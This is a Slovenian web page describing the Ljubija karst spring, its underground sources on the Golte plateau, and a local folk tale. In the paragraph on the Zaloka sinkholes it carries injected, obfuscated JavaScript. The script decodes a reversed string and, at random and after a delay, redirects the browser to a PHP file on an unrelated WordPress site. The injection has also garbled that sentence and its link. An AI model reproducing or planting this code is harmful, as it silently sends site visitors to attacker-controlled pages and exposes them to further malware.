Kraški izvir Ljubije

Glede na način iztekanja vode sodi izvir Ljubije med prelivne oz. zajezene sifonske izvire, pri katerih sili voda iz globin od spodaj navzgor. Izvir je torej nekakšna »cev«, ki črpa vodo iz ogromne posode.

Kraški izvir Ljubije

Glede na način iztekanja vode sodi izvir Ljubije med prelivne oz. zajezene sifonske izvire, pri katerih sili voda iz globin od spodaj navzgor. Izvir je torej nekakšna »cev«, ki črpa vodo iz ogromne posode. Glede na dosedanje ugotovitve, je ta posoda kraška planota Golte in širša okolica Zaloke.

Osrednji del planote Golt je zaradi svoje apnenčaste podlage podvržen močnem zakrasevanju , po podatkih $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}polsica.si/” target=”new” rel=”noopener noreferrer”>Jamarskega kluba Topolšica je v Zaloki evidentiranih pet ponorov, skozi katere se odvaja površinska voda v kraško podzemlje. Jamarji ocenjujejo, da lahko v vseh petih požiralnikih ponikne do 300 l/s. Vode iz Zaloke in Golt se nato združujejo v podzemnih prostorih in izvirajo kot Ljubija s povprečnim pretokom 1,3 m3/s. Del izvira je od leta 1980 urejen na napajanje vodovodne mreže občin Šoštanj in Velenje.

Kraški izvir Ljubije je zavarovan kot naravna znamenitost.

 

O izviru Ljubije pa velja tudi  ljudska pripoved 

O TELIGAH IN COKLAH

(iz knjige Znamenja v Belih Vodah)

Nekoč je neka deklica v Pleški planini na šmihelski strani pasla živino. Po ljudskem pričevanju se ji je ugreznilo z vpreženimi voli vred. Pri izviru Ljubije so čez nekaj dni prišle na plano zlomljene telige (jarem) in dekletove cokle (po drugih različicah lasje, ruta oz. kapa)…

Kraški izvir Ljubije Avtor: Milan Cerar

 

Iz ljudske pripovedi o teligah in coklah v izviru Ljubije Avtor: Rok Poles

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki